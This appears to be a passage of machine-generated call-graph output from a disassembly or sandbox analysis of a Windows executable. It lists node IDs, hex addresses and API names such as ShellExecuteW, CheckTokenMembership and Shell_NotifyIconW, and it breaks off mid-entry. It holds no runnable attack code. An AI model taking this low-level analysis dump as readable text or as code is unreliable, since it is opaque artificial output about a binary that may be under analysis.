104708->104707 104751 fd1940 104709->104751 104712 fa7de1 59 API calls 104713 fa4739 104712->104713 104753 fa4750 104713->104753 104715 fa4743 Mailbox 104715->104683 104717 fd1940 __write_nolock 104716->104717 104718 fc0518 GetFullPathNameW 104717->104718 104719 fc053a 104718->104719 104720 fa7bcc 59 API calls 104719->104720 104721 fa7165 104720->104721 104722 fa7cab 104721->104722 104723 fa7cbf 104722->104723 104724 fded4a 104722->104724 104767 fa7c50 104723->104767 104726 fa8029 59 API calls 104724->104726 104728 fded55 __wsetenvp _memmove 104726->104728 104727 fa7173 104729 fa3f74 104727->104729 104730 fa3f82 104729->104730 104734 fa3fa4 _memmove 104729->104734 104733 fc0db6 Mailbox 59 API calls 104730->104733 104731 fc0db6 Mailbox 59 API calls 104732 fa3fb8 104731->104732 104732->104690 104733->104734 104734->104731 104736 fa7da6 104735->104736 104738 fa7d99 104735->104738 104737 fc0db6 Mailbox 59 API calls 104736->104737 104737->104738 104738->104693 104740 fc0db6 Mailbox 59 API calls 104739->104740 104741 fa5240 RegQueryValueExW 104740->104741 104741->104702 104741->104705 104743 fa7bd8 __wsetenvp 104742->104743 104744 fa7c45 104742->104744 104746 fa7bee 104743->104746 104747 fa7c13 104743->104747 104745 fa7d2c 59 API calls 104744->104745 104750 fa7bf6 _memmove 104745->104750 104772 fa7f27 59 API calls Mailbox 104746->104772 104749 fa8029 59 API calls 104747->104749 104749->104750 104750->104705 104752 fa4713 GetModuleFileNameW 104751->104752 104752->104712 104754 fd1940 __write_nolock 104753->104754 104755 fa475d GetFullPathNameW 104754->104755 104756 fa4799 104755->104756 104757 fa477c 104755->104757 104759 fa7d8c 59 API calls 104756->104759 104758 fa7bcc 59 API calls 104757->104758 104760 fa4788 104758->104760 104759->104760 104763 fa7726 104760->104763 104764 fa7734 104763->104764 104765 fa7d2c 59 API calls 104764->104765 104766 fa4794 104765->104766 104766->104715 104768 fa7c5f __wsetenvp 104767->104768 104769 fa8029 59 API calls 104768->104769 104770 fa7c70 _memmove 104768->104770 104771 fded07 _memmove 104769->104771 104770->104727 104772->104750 104773 fa3633 104774 fa366a 104773->104774 104775 fa3688 104774->104775 104776 fa36e7 104774->104776 104777 fa36e5 104774->104777 104778 fa374b PostQuitMessage 104775->104778 104779 fa3695 104775->104779 104781 fdd0cc 104776->104781 104782 fa36ed 104776->104782 104780 fa36ca DefWindowProcW 104777->104780 104786 fa36d8 104778->104786 104784 fdd154 104779->104784 104785 fa36a0 104779->104785 104780->104786 104822 fb1070 10 API calls Mailbox 104781->104822 104787 fa36f2 104782->104787 104788 fa3715 SetTimer RegisterWindowMessageW 104782->104788 104838 1002527 71 API calls _memset 104784->104838 104790 fa36a8 104785->104790 104791 fa3755 104785->104791 104794 fdd06f 104787->104794 104795 fa36f9 KillTimer 104787->104795 104788->104786 104792 fa373e CreatePopupMenu 104788->104792 104789 fdd0f3 104823 fb1093 341 API calls Mailbox 104789->104823 104797 fdd139 104790->104797 104798 fa36b3 104790->104798 104820 fa44a0 64 API calls _memset 104791->104820 104792->104786 104801 fdd0a8 MoveWindow 104794->104801 104802 fdd074 104794->104802 104818 fa443a Shell_NotifyIconW _memset 104795->104818 104797->104780 104837 ff7c36 59 API calls Mailbox 104797->104837 104804 fa36be 104798->104804 104805 fdd124 104798->104805 104799 fdd166 104799->104780 104799->104786 104801->104786 104807 fdd078 104802->104807 104808 fdd097 SetFocus 104802->104808 104804->104780 104824 fa443a Shell_NotifyIconW _memset 104804->104824 104836 1002d36 81 API calls _memset 104805->104836 104806 fa3764 104806->104786 104807->104804 104812 fdd081 104807->104812 104808->104786 104809 fa370c 104819 fa3114 DeleteObject DestroyWindow Mailbox 104809->104819 104821 fb1070 10 API calls Mailbox 104812->104821 104816 fdd118 104825 fa434a 104816->104825 104818->104809 104819->104786 104820->104806 104821->104786 104822->104789 104823->104804 104824->104816 104826 fa4375 _memset 104825->104826 104839 fa4182 104826->104839 104829 fa43fa 104831 fa4430 Shell_NotifyIconW 104829->104831 104832 fa4414 Shell_NotifyIconW 104829->104832 104833 fa4422 104831->104833 104832->104833 104843 fa407c 104833->104843 104835 fa4429 104835->104777 104836->104806 104837->104777 104838->104799 104840 fa4196 104839->104840 104841 fdd423 104839->104841 104840->104829 104865 1002f94 62 API calls _W_store_winword 104840->104865 104841->104840 104842 fdd42c DestroyIcon 104841->104842 104842->104840 104844 fa4098 104843->104844 104845 fa416f Mailbox 104843->104845 104866 fa7a16 104844->104866 104845->104835 104848 fdd3c8 LoadStringW 104852 fdd3e2 104848->104852 104849 fa40b3 104850 fa7bcc 59 API calls 104849->104850 104851 fa40c8 104850->104851 104851->104852 104853 fa40d9 104851->104853 104854 fa7b2e 59 API calls 104852->104854 104855 fa40e3 104853->104855 104856 fa4174 104853->104856 104859 fdd3ec 104854->104859 104858 fa7b2e 59 API calls 104855->104858 104857 fa8047 59 API calls 104856->104857 104861 fa40ed _memset _wcscpy 104857->104861 104858->104861 104860 fa7cab 59 API calls 104859->104860 104859->104861 104862 fdd40e 104860->104862 104863 fa4155 Shell_NotifyIconW 104861->104863 104864 fa7cab 59 API calls 104862->104864 104863->104845 104864->104861 104865->104829 104867 fc0db6 Mailbox 59 API calls 104866->104867 104868 fa7a3b 104867->104868 104869 fa8029 59 API calls 104868->104869 104870 fa40a6 104869->104870 104870->104848 104870->104849 104871 fc7c56 104872 fc7c62 __wfsopen 104871->104872 104908 fc9e08 GetStartupInfoW 104872->104908 104874 fc7c67 104910 fc8b7c GetProcessHeap 104874->104910 104876 fc7cbf 104877 fc7cca 104876->104877 104993 fc7da6 58 API calls 3 library calls 104876->104993 104911 fc9ae6 104877->104911 104880 fc7cd0 104881 fc7cdb __RTC_Initialize 104880->104881 104994 fc7da6 58 API calls 3 library calls 104880->104994 104932 fcd5d2 104881->104932 104884 fc7cea 104885 fc7cf6 GetCommandLineW 104884->104885 104995 fc7da6 58 API calls 3 library calls 104884->104995 104951 fd4f23 GetEnvironmentStringsW 104885->104951 104889 fc7cf5 104889->104885 104891 fc7d10 104892 fc7d1b 104891->104892 104996 fc30b5 58 API calls 3 library calls 104891->104996 104961 fd4d58 104892->104961 104895 fc7d21 104896 fc7d2c 104895->104896 104997 fc30b5 58 API calls 3 library calls 104895->104997 104975 fc30ef 104896->104975 104899 fc7d34 104900 fc7d3f __wwincmdln 104899->104900 104998 fc30b5 58 API calls 3 library calls 104899->104998 104981 fa47d0 104900->104981 104903 fc7d53 104904 fc7d62 104903->104904 104999 fc3358 58 API calls _doexit 104903->104999 105000 fc30e0 58 API calls _doexit 104904->105000 104907 fc7d67 __wfsopen 104909 fc9e1e 104908->104909 104909->104874 104910->104876 105001 fc3187 36 API calls 2 library calls 104911->105001 104913 fc9aeb 105002 fc9d3c InitializeCriticalSectionAndSpinCount __mtinitlocks 104913->105002 104915 fc9af0 104916 fc9af4 104915->104916 105004 fc9d8a TlsAlloc 104915->105004 105003 fc9b5c 61 API calls 2 library calls 104916->105003 104919 fc9b06 104919->104916 104921 fc9b11 104919->104921 104920 fc9af9 104920->104880 105005 fc87d5 104921->105005 104924 fc9b53 105013 fc9b5c 61 API calls 2 library calls 104924->105013 104927 fc9b32 104927->104924 104929 fc9b38 104927->104929 104928 fc9b58 104928->104880 105012 fc9a33 58 API calls 4 library calls 104929->105012 104931 fc9b40 GetCurrentThreadId 104931->104880 104933 fcd5de __wfsopen 104932->104933 104934 fc9c0b __lock 58 API calls 104933->104934 104935 fcd5e5 104934->104935 104936 fc87d5 __calloc_crt 58 API calls 104935->104936 104937 fcd5f6 104936->104937 104938 fcd661 GetStartupInfoW 104937->104938 104939 fcd601 __wfsopen @_EH4_CallFilterFunc@8 104937->104939 104945 fcd676 104938->104945 104948 fcd7a5 104938->104948 104939->104884 104940 fcd86d 105027 fcd87d LeaveCriticalSection _doexit 104940->105027 104942 fc87d5 __calloc_crt 58 API calls 104942->104945 104943 fcd7f2 GetStdHandle 104943->104948 104944 fcd805 GetFileType 104944->104948 104945->104942 104947 fcd6c4 104945->104947 104945->104948 104946 fcd6f8 GetFileType 104946->104947 104947->104946 104947->104948 105025 fc9e2b InitializeCriticalSectionAndSpinCount 104947->105025 104948->104940 104948->104943 104948->104944 105026 fc9e2b InitializeCriticalSectionAndSpinCount 104948->105026 104952 fc7d06 104951->104952 104953 fd4f34 104951->104953 104957 fd4b1b GetModuleFileNameW 104952->104957 105028 fc881d 58 API calls 2 library calls 104953->105028 104955 fd4f5a _memmove 104956 fd4f70 FreeEnvironmentStringsW 104955->104956 104956->104952 104958 fd4b4f _wparse_cmdline 104957->104958 104960 fd4b8f _wparse_cmdline 104958->104960 105029 fc881d 58 API calls 2 library calls 104958->105029 104960->104891 104962 fd4d71 __wsetenvp 104961->104962 104966 fd4d69 104961->104966 104963 fc87d5 __calloc_crt 58 API calls 104962->104963 104971 fd4d9a __wsetenvp 104963->104971 104964 fd4df1 104965 fc2d55 _free 58 API calls 104964->104965 104965->104966 104966->104895 104967 fc87d5 __calloc_crt 58 API calls 104967->104971 104968 fd4e16 104969 fc2d55 _free 58 API calls 104968->104969 104969->104966 104971->104964 104971->104966 104971->104967 104971->104968 104972 fd4e2d 104971->104972 105030 fd4607 58 API calls __wfsopen 104971->105030 105031 fc8dc6 IsProcessorFeaturePresent 104972->105031 104974 fd4e39 104974->104895 104977 fc30fb __IsNonwritableInCurrentImage 104975->104977 105054 fca4d1 104977->105054 104978 fc3119 __initterm_e 104979 fc2d40 __cinit 67 API calls 104978->104979 104980 fc3138 __cinit __IsNonwritableInCurrentImage 104978->104980 104979->104980 104980->104899 104982 fa47ea 104981->104982 104992 fa4889 104981->104992 104983 fa4824 IsThemeActive 104982->104983 105057 fc336c 104983->105057 104987 fa4850 105069 fa48fd SystemParametersInfoW SystemParametersInfoW 104987->105069 104989 fa485c 105070 fa3b3a 104989->105070 104991 fa4864 SystemParametersInfoW 104991->104992 104992->104903 104993->104877 104994->104881 104995->104889 104999->104904 105000->104907 105001->104913 105002->104915 105003->104920 105004->104919 105006 fc87dc 105005->105006 105008 fc8817 105006->105008 105010 fc87fa 105006->105010 105014 fd51f6 105006->105014 105008->104924 105011 fc9de6 TlsSetValue 105008->105011 105010->105006 105010->105008 105022 fca132 Sleep 105010->105022 105011->104927 105012->104931 105013->104928 105015 fd5201 105014->105015 105020 fd521c 105014->105020 105016 fd520d 105015->105016 105015->105020 105023 fc8b28 58 API calls __getptd_noexit 105016->105023 105018 fd522c RtlAllocateHeap 105019 fd5212 105018->105019 105018->105020 105019->105006 105020->105018 105020->105019 105024 fc33a1 DecodePointer 105020->105024 105022->105010 105023->105019 105024->105020 105025->104947 105026->104948 105027->104939 105028->104955 105029->104960 105030->104971 105032 fc8dd1 105031->105032 105037 fc8c59 105032->105037 105036 fc8dec 105036->104974 105038 fc8c73 _memset __call_reportfault 105037->105038 105039 fc8c93 IsDebuggerPresent 105038->105039 105045 fca155 SetUnhandledExceptionFilter UnhandledExceptionFilter 105039->105045 105042 fc8d7a 105044 fca140 GetCurrentProcess TerminateProcess 105042->105044 105043 fc8d57 __call_reportfault 105046 fcc5f6 105043->105046 105044->105036 105045->105043 105047 fcc5fe 105046->105047 105048 fcc600 IsProcessorFeaturePresent 105046->105048 105047->105042 105050 fd590a 105048->105050 105053 fd58b9 5 API calls 2 library calls 105050->105053 105052 fd59ed 105052->105042 105053->105052 105055 fca4d4 EncodePointer 105054->105055 105055->105055 105056 fca4ee 105055->105056 105056->104978 105058 fc9c0b __lock 58 API calls 105057->105058 105059 fc3377 DecodePointer EncodePointer 105058->105059 105122 fc9d75 LeaveCriticalSection 105059->105122 105061 fa4849 105062 fc33d4 105061->105062 105063 fc33de 105062->105063 105064 fc33f8 105062->105064 105063->105064 105123 fc8b28 58 API calls __getptd_noexit 105063->105123 105064->104987 105066 fc33e8 105124 fc8db6 9 API calls __wfsopen 105066->105124 105068 fc33f3 105068->104987 105069->104989 105071 fa3b47 __write_nolock 105070->105071 105072 fa7667 59 API calls 105071->105072 105073 fa3b51 GetCurrentDirectoryW 105072->105073 105125 fa3766 105073->105125 105075 fa3b7a IsDebuggerPresent 105076 fa3b88 105075->105076 105077 fdd272 MessageBoxA 105075->105077 105078 fa3c61 105076->105078 105080 fdd28c 105076->105080 105081 fa3ba5 105076->105081 105077->105080 105079 fa3c68 SetCurrentDirectoryW 105078->105079 105084 fa3c75 Mailbox 105079->105084 105324 fa7213 59 API calls Mailbox 105080->105324 105206 fa7285 105081->105206 105084->104991 105085 fdd29c 105090 fdd2b2 SetCurrentDirectoryW 105085->105090 105087 fa3bc3 GetFullPathNameW 105088 fa7bcc 59 API calls 105087->105088 105089 fa3bfe 105088->105089 105222 fb092d 105089->105222 105090->105084 105093 fa3c1c 105094 fa3c26 105093->105094 105325 ff874b AllocateAndInitializeSid CheckTokenMembership FreeSid 105093->105325 105238 fa3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 105094->105238 105098 fdd2cf 105098->105094 105101 fdd2e0 105098->105101 105100 fa3c30 105103 fa3c43 105100->105103 105105 fa434a 68 API calls 105100->105105 105102 fa4706 61 API calls 105101->105102 105104 fdd2e8 105102->105104 105246 fb09d0 105103->105246 105107 fa7de1 59 API calls 105104->105107 105105->105103 105109 fdd2f5 105107->105109 105110 fdd2ff 105109->105110 105111 fdd324 105109->105111 105113 fa7cab 59 API calls 105110->105113 105114 fa7cab 59 API calls 105111->105114 105115 fdd30a 105113->105115 105116 fdd320 GetForegroundWindow ShellExecuteW 105114->105116 105117 fa7b2e 59 API calls 105115->105117 105120 fdd354 Mailbox 105116->105120 105120->105078 105122->105061 105123->105066 105124->105068 105126 fa7667 59 API calls 105125->105126 105127 fa377c 105126->105127 105326 fa3d31 105127->105326 105129 fa379a 105130 fa4706 61 API calls 105129->105130 105131 fa37ae 105130->105131 105132 fa7de1 59 API calls 105131->105132 105133 fa37bb 105132->105133 105340 fa4ddd 105133->105340 105136 fa37dc Mailbox 105141 fa8047 59 API calls 105136->105141 105137 fdd173 105392 100955b 105137->105392 105140 fdd192 105143 fc2d55 _free 58 API calls 105140->105143 105144 fa37ef 105141->105144 105145 fdd19f 105143->105145 105364 fa928a 105144->105364 105147 fa4e4a 84 API calls 105145->105147 105149 fdd1a8 105147->105149 105153 fa3ed0 59 API calls 105149->105153 105150 fa7de1 59 API calls 105151 fa3808 105150->105151 105152 fa84c0 69 API calls 105151->105152 105154 fa381a Mailbox 105152->105154 105155 fdd1c3 105153->105155 105156 fa7de1 59 API calls 105154->105156 105157 fa3ed0 59 API calls 105155->105157 105158 fa3840 105156->105158 105159 fdd1df 105157->105159 105160 fa84c0 69 API calls 105158->105160 105161 fa4706 61 API calls 105159->105161 105163 fa384f Mailbox 105160->105163 105162 fdd204 105161->105162 105164 fa3ed0 59 API calls 105162->105164 105166 fa7667 59 API calls 105163->105166 105165 fdd210 105164->105165 105167 fa8047 59 API calls 105165->105167 105168 fa386d 105166->105168 105169 fdd21e 105167->105169 105367 fa3ed0 105168->105367 105171 fa3ed0 59 API calls 105169->105171 105174 fdd22d 105171->105174 105179 fa8047 59 API calls 105174->105179 105175 fa3887 105175->105149 105176 fa3891 105175->105176 105177 fc2efd _W_store_winword 60 API calls 105176->105177 105178 fa389c 105177->105178 105178->105155 105180 fa38a6 105178->105180 105181 fdd24f 105179->105181 105182 fc2efd _W_store_winword 60 API calls 105180->105182 105183 fa3ed0 59 API calls 105181->105183 105184 fa38b1 105182->105184 105185 fdd25c 105183->105185 105184->105159 105186 fa38bb 105184->105186 105185->105185 105187 fc2efd _W_store_winword 60 API calls 105186->105187 105188 fa38c6 105187->105188 105188->105174 105189 fa3907 105188->105189 105191 fa3ed0 59 API calls 105188->105191 105189->105174 105190 fa3914 105189->105190 105192 fa92ce 59 API calls 105190->105192 105193 fa38ea 105191->105193 105194 fa3924 105192->105194 105195 fa8047 59 API calls 105193->105195 105197 fa9050 59 API calls 105194->105197 105196 fa38f8 105195->105196 105198 fa3ed0 59 API calls 105196->105198 105199 fa3932 105197->105199 105198->105189 105383 fa8ee0 105199->105383 105201 fa928a 59 API calls 105202 fa394f 105201->105202 105202->105201 105203 fa8ee0 60 API calls 105202->105203 105204 fa3ed0 59 API calls 105202->105204 105205 fa3995 Mailbox 105202->105205 105203->105202 105204->105202 105205->105075 105207 fa7292 __write_nolock 105206->105207 105208 fa72ab 105207->105208 105209 fdea22 _memset 105207->105209 105210 fa4750 60 API calls 105208->105210 105211 fdea3e GetOpenFileNameW 105209->105211 105212 fa72b4 105210->105212 105213 fdea8d 105211->105213 106234 fc0791 105212->106234 105215 fa7bcc 59 API calls 105213->105215 105217 fdeaa2 105215->105217 105217->105217 105219 fa72c9 106252 fa686a 105219->106252 105223 fb093a __write_nolock 105222->105223 106480 fa6d80 105223->106480 105225 fb093f 105237 fa3c14 105225->105237 106491 fb119e 89 API calls 105225->106491 105227 fb094c 105227->105237 106492 fb3ee7 91 API calls Mailbox 105227->106492 105229 fb0955 105230 fb0959 GetFullPathNameW 105229->105230 105229->105237 105231 fa7bcc 59 API calls 105230->105231 105232 fb0985 105231->105232 105233 fa7bcc 59 API calls 105232->105233 105234 fb0992 105233->105234 105235 fe4cab _wcscat 105234->105235 105236 fa7bcc 59 API calls 105234->105236 105236->105237 105237->105085 105237->105093 105239 fa3ab0 LoadImageW RegisterClassExW 105238->105239 105240 fdd261 105238->105240 106529 fa3041 7 API calls 105239->106529 106530 fa47a0 LoadImageW EnumResourceNamesW 105240->106530 105243 fdd26a 105244 fa3b34 105245 fa39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105244->105245 105245->105100 105247 fe4cc3 105246->105247 105258 fb09f5 105246->105258 106594 1009e4a 89 API calls 4 library calls 105247->106594 105254 fb0a4b PeekMessageW 105289 fb0a05 Mailbox 105254->105289 105258->105289 106595 fa9e5d 60 API calls 105258->106595 106596 ff6349 341 API calls 105258->106596 105259 fe4e81 Sleep 105259->105289 105261 fb0ce4 105265 fb0e43 PeekMessageW 105265->105289 105266 fb0ea5 TranslateMessage DispatchMessageW 105266->105265 105267 fe4d50 TranslateAcceleratorW 105267->105265 105267->105289 105268 fc0db6 59 API calls Mailbox 105268->105289 105269 fb0d13 timeGetTime 105269->105289 105270 fe581f WaitForSingleObject 105270->105289 105273 fb0e5f Sleep 105302 fb0e70 Mailbox 105273->105302 105274 fa8047 59 API calls 105274->105289 105277 fe5af8 Sleep 105277->105302 105281 fb0f4e timeGetTime 105285 fa9837 84 API calls 105285->105289 105289->105254 105289->105259 105289->105261 105289->105265 105289->105266 105289->105267 105289->105268 105289->105269 105289->105270 105289->105273 105289->105274 105289->105277 105289->105281 105289->105285 105293 fa9e5d 60 API calls 105289->105293 105289->105302 105307 fb0f95 105289->105307 105309 1009e4a 89 API calls 105289->105309 105311 fa9c90 59 API calls Mailbox 105289->105311 105312 fa9ea0 314 API calls 105289->105312 105313 fa84c0 69 API calls 105289->105313 105315 ff617e 59 API calls Mailbox 105289->105315 105316 fe55d5 VariantClear 105289->105316 105317 fe566b VariantClear 105289->105317 105318 fa8cd4 59 API calls Mailbox 105289->105318 105319 fe5419 VariantClear 105289->105319 105320 ff6e8f 59 API calls 105289->105320 105321 fa7de1 59 API calls 105289->105321 105322 fa89b3 69 API calls 105289->105322 105293->105289 105302->105289 105302->105307 105309->105289 105311->105289 105312->105289 105313->105289 105315->105289 105316->105289 105317->105289 105318->105289 105319->105289 105320->105289 105321->105289 105322->105289 105324->105085 105325->105098 105327 fa3d3e __write_nolock 105326->105327 105328 fa7bcc 59 API calls 105327->105328 105333 fa3ea4 Mailbox 105327->105333 105330 fa3d70 105328->105330 105329 fa79f2 59 API calls 105329->105330 105330->105329 105338 fa3da6 Mailbox 105330->105338 105331 fa3e77 105332 fa7de1 59 API calls 105331->105332 105331->105333 105335 fa3e98 105332->105335 105333->105129 105334 fa7de1 59 API calls 105334->105338 105336 fa3f74 59 API calls 105335->105336 105336->105333 105337 fa3f74 59 API calls 105337->105338 105338->105331 105338->105333 105338->105334 105338->105337 105339 fa79f2 59 API calls 105338->105339 105339->105338 105433 fa4bb5 105340->105433 105345 fa4e08 LoadLibraryExW 105443 fa4b6a 105345->105443 105346 fdd8e6 105348 fa4e4a 84 API calls 105346->105348 105350 fdd8ed 105348->105350 105352 fa4b6a 3 API calls 105350->105352 105354 fdd8f5 105352->105354 105353 fa4e2f 105353->105354 105355 fa4e3b 105353->105355 105469 fa4f0b 105354->105469 105356 fa4e4a 84 API calls 105355->105356 105358 fa37d4 105356->105358 105358->105136 105358->105137 105361 fdd91c 105477 fa4ec7 105361->105477 105363 fdd929 105365 fc0db6 Mailbox 59 API calls 105364->105365 105366 fa37fb 105365->105366 105366->105150 105368 fa3eda 105367->105368 105369 fa3ef3 105367->105369 105370 fa8047 59 API calls 105368->105370 105371 fa7bcc 59 API calls 105369->105371 105372 fa3879 105370->105372 105371->105372 105373 fc2efd 105372->105373 105374 fc2f7e 105373->105374 105375 fc2f09 105373->105375 105906 fc2f90 60 API calls 3 library calls 105374->105906 105382 fc2f2e 105375->105382 105904 fc8b28 58 API calls __getptd_noexit 105375->105904 105378 fc2f8b 105378->105175 105379 fc2f15 105905 fc8db6 9 API calls __wfsopen 105379->105905 105381 fc2f20 105381->105175 105382->105175 105384 fdf17c 105383->105384 105390 fa8ef7 105383->105390 105384->105390 105908 fa8bdb 59 API calls Mailbox 105384->105908 105386 fa8fff 105386->105202 105387 fa8ff8 105391 fc0db6 Mailbox 59 API calls 105387->105391 105388 fa9040 105907 fa9d3c 60 API calls Mailbox 105388->105907 105390->105386 105390->105387 105390->105388 105391->105386 105393 fa4ee5 85 API calls 105392->105393 105394 10095ca 105393->105394 105909 1009734 105394->105909 105397 fa4f0b 74 API calls 105398 10095f7 105397->105398 105399 fa4f0b 74 API calls 105398->105399 105400 1009607 105399->105400 105401 fa4f0b 74 API calls 105400->105401 105402 1009622 105401->105402 105403 fa4f0b 74 API calls 105402->105403 105404 100963d 105403->105404 105405 fa4ee5 85 API calls 105404->105405 105406 1009654 105405->105406 105407 fc571c __crtGetStringTypeA_stat 58 API calls 105406->105407 105408 100965b 105407->105408 105409 fc571c __crtGetStringTypeA_stat 58 API calls 105408->105409 105410 1009665 105409->105410 105411 fa4f0b 74 API calls 105410->105411 105412 1009679 105411->105412 105413 1009109 GetSystemTimeAsFileTime 105412->105413 105414 100968c 105413->105414 105415 10096a1 105414->105415 105416 10096b6 105414->105416 105419 fc2d55 _free 58 API calls 105415->105419 105417 100971b 105416->105417 105418 10096bc 105416->105418 105421 fc2d55 _free 58 API calls 105417->105421 105915 1008b06 105418->105915 105422 10096a7 105419->105422 105424 fdd186 105421->105424 105425 fc2d55 _free 58 API calls 105422->105425 105424->105140 105427 fa4e4a 105424->105427 105425->105424 105426 fc2d55 _free 58 API calls 105426->105424 105428 fa4e5b 105427->105428 105429 fa4e54 105427->105429 105431 fa4e6a 105428->105431 105432 fa4e7b FreeLibrary 105428->105432 105430 fc53a6 __fcloseall 83 API calls 105429->105430 105430->105428 105431->105140 105432->105431 105482 fa4c03 105433->105482 105436 fa4bdc 105438 fa4bec FreeLibrary 105436->105438 105439 fa4bf5 105436->105439 105437 fa4c03 2 API calls 105437->105436 105438->105439 105440 fc525b 105439->105440 105486 fc5270 105440->105486 105442 fa4dfc 105442->105345 105442->105346 105644 fa4c36 105443->105644 105446 fa4c36 2 API calls 105449 fa4b8f 105446->105449 105447 fa4baa 105450 fa4c70 105447->105450 105448 fa4ba1 FreeLibrary 105448->105447 105449->105447 105449->105448 105451 fc0db6 Mailbox 59 API calls 105450->105451 105452 fa4c85 105451->105452 105453 fa522e 59 API calls 105452->105453 105454 fa4c91 _memmove 105453->105454 105455 fa4ccc 105454->105455 105457 fa4d89 105454->105457 105458 fa4dc1 105454->105458 105456 fa4ec7 69 API calls 105455->105456 105464 fa4cd5 105456->105464 105648 fa4e89 CreateStreamOnHGlobal 105457->105648 105659 100991b 95 API calls 105458->105659 105461 fa4f0b 74 API calls 105461->105464 105463 fa4d69 105463->105353 105464->105461 105464->105463 105465 fdd8a7 105464->105465 105654 fa4ee5 105464->105654 105466 fa4ee5 85 API calls 105465->105466 105467 fdd8bb 105466->105467 105468 fa4f0b 74 API calls 105467->105468 105468->105463 105470 fdd9cd 105469->105470 105471 fa4f1d 105469->105471 105683 fc55e2 105471->105683 105474 1009109 105881 1008f5f 105474->105881 105476 100911f 105476->105361 105478 fa4ed6 105477->105478 105479 fdd990 105477->105479 105886 fc5c60 105478->105886 105481 fa4ede 105481->105363 105483 fa4bd0 105482->105483 105484 fa4c0c LoadLibraryA 105482->105484 105483->105436 105483->105437 105484->105483 105485 fa4c1d GetProcAddress 105484->105485 105485->105483 105489 fc527c __wfsopen 105486->105489 105487 fc528f 105535 fc8b28 58 API calls __getptd_noexit 105487->105535 105489->105487 105491 fc52c0 105489->105491 105490 fc5294 105536 fc8db6 9 API calls __wfsopen 105490->105536 105505 fd04e8 105491->105505 105494 fc52c5 105495 fc52ce 105494->105495 105496 fc52db 105494->105496 105537 fc8b28 58 API calls __getptd_noexit 105495->105537 105497 fc5305 105496->105497 105498 fc52e5 105496->105498 105520 fd0607 105497->105520 105538 fc8b28 58 API calls __getptd_noexit 105498->105538 105500 fc529f __wfsopen @_EH4_CallFilterFunc@8 105500->105442 105506 fd04f4 __wfsopen 105505->105506 105507 fc9c0b __lock 58 API calls 105506->105507 105518 fd0502 105507->105518 105508 fd057d 105545 fc881d 58 API calls 2 library calls 105508->105545 105509 fd0576 105540 fd05fe 105509->105540 105512 fd0584 105512->105509 105546 fc9e2b InitializeCriticalSectionAndSpinCount 105512->105546 105513 fd05f3 __wfsopen 105513->105494 105515 fc9c93 __mtinitlocknum 58 API calls 105515->105518 105517 fd05aa EnterCriticalSection 105517->105509 105518->105508 105518->105509 105518->105515 105543 fc6c50 59 API calls __lock 105518->105543 105544 fc6cba LeaveCriticalSection LeaveCriticalSection _doexit 105518->105544 105528 fd0627 __wopenfile 105520->105528 105521 fd0641 105551 fc8b28 58 API calls __getptd_noexit 105521->105551 105523 fd0646 105552 fc8db6 9 API calls __wfsopen 105523->105552 105525 fd085f 105548 fd85a1 105525->105548 105526 fc5310 105539 fc5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105526->105539 105528->105521 105534 fd07fc 105528->105534 105553 fc37cb 60 API calls 2 library calls 105528->105553 105530 fd07f5 105530->105534 105554 fc37cb 60 API calls 2 library calls 105530->105554 105532 fd0814 105532->105534 105555 fc37cb 60 API calls 2 library calls 105532->105555 105534->105521 105534->105525 105535->105490 105536->105500 105537->105500 105538->105500 105539->105500 105547 fc9d75 LeaveCriticalSection 105540->105547 105542 fd0605 105542->105513 105543->105518 105544->105518 105545->105512 105546->105517 105547->105542 105556 fd7d85 105548->105556 105550 fd85ba 105550->105526 105551->105523 105552->105526 105553->105530 105554->105532 105555->105534 105557 fd7d91 __wfsopen 105556->105557 105558 fd7da7 105557->105558 105561 fd7ddd 105557->105561 105641 fc8b28 58 API calls __getptd_noexit 105558->105641 105560 fd7dac 105642 fc8db6 9 API calls __wfsopen 105560->105642 105567 fd7e4e 105561->105567 105564 fd7db6 __wfsopen 105564->105550 105565 fd7df9 105643 fd7e22 LeaveCriticalSection __unlock_fhandle 105565->105643 105568 fd7e6e 105567->105568 105569 fc44ea __wsopen_nolock 58 API calls 105568->105569 105572 fd7e8a 105569->105572 105570 fc8dc6 __invoke_watson 8 API calls 105571 fd85a0 105570->105571 105573 fd7d85 __wsopen_helper 103 API calls 105571->105573 105574 fd7ec4 105572->105574 105581 fd7ee7 105572->105581 105640 fd7fc1 105572->105640 105575 fd85ba 105573->105575 105576 fc8af4 __write_nolock 58 API calls 105574->105576 105575->105565 105577 fd7ec9 105576->105577 105578 fc8b28 __wfsopen 58 API calls 105577->105578 105579 fd7ed6 105578->105579 105580 fc8db6 __wfsopen 9 API calls 105579->105580 105583 fd7ee0 105580->105583 105582 fd7fa5 105581->105582 105589 fd7f83 105581->105589 105584 fc8af4 __write_nolock 58 API calls 105582->105584 105583->105565 105585 fd7faa 105584->105585 105586 fc8b28 __wfsopen 58 API calls 105585->105586 105587 fd7fb7 105586->105587 105588 fc8db6 __wfsopen 9 API calls 105587->105588 105588->105640 105590 fcd294 __alloc_osfhnd 61 API calls 105589->105590 105591 fd8051 105590->105591 105592 fd807e 105591->105592 105593 fd805b 105591->105593 105594 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105592->105594 105595 fc8af4 __write_nolock 58 API calls 105593->105595 105604 fd80a0 105594->105604 105596 fd8060 105595->105596 105598 fc8b28 __wfsopen 58 API calls 105596->105598 105597 fd811e GetFileType 105599 fd8129 GetLastError 105597->105599 105600 fd816b 105597->105600 105602 fd806a 105598->105602 105603 fc8b07 __dosmaperr 58 API calls 105599->105603 105612 fcd52a __set_osfhnd 59 API calls 105600->105612 105601 fd80ec GetLastError 105605 fc8b07 __dosmaperr 58 API calls 105601->105605 105606 fc8b28 __wfsopen 58 API calls 105602->105606 105607 fd8150 CloseHandle 105603->105607 105604->105597 105604->105601 105608 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105604->105608 105609 fd8111 105605->105609 105606->105583 105607->105609 105610 fd815e 105607->105610 105611 fd80e1 105608->105611 105614 fc8b28 __wfsopen 58 API calls 105609->105614 105613 fc8b28 __wfsopen 58 API calls 105610->105613 105611->105597 105611->105601 105616 fd8189 105612->105616 105615 fd8163 105613->105615 105614->105640 105615->105609 105617 fd8344 105616->105617 105618 fd18c1 __lseeki64_nolock 60 API calls 105616->105618 105638 fd820a 105616->105638 105619 fd8517 CloseHandle 105617->105619 105617->105640 105620 fd81f3 105618->105620 105621 fd7cfd ___createFile 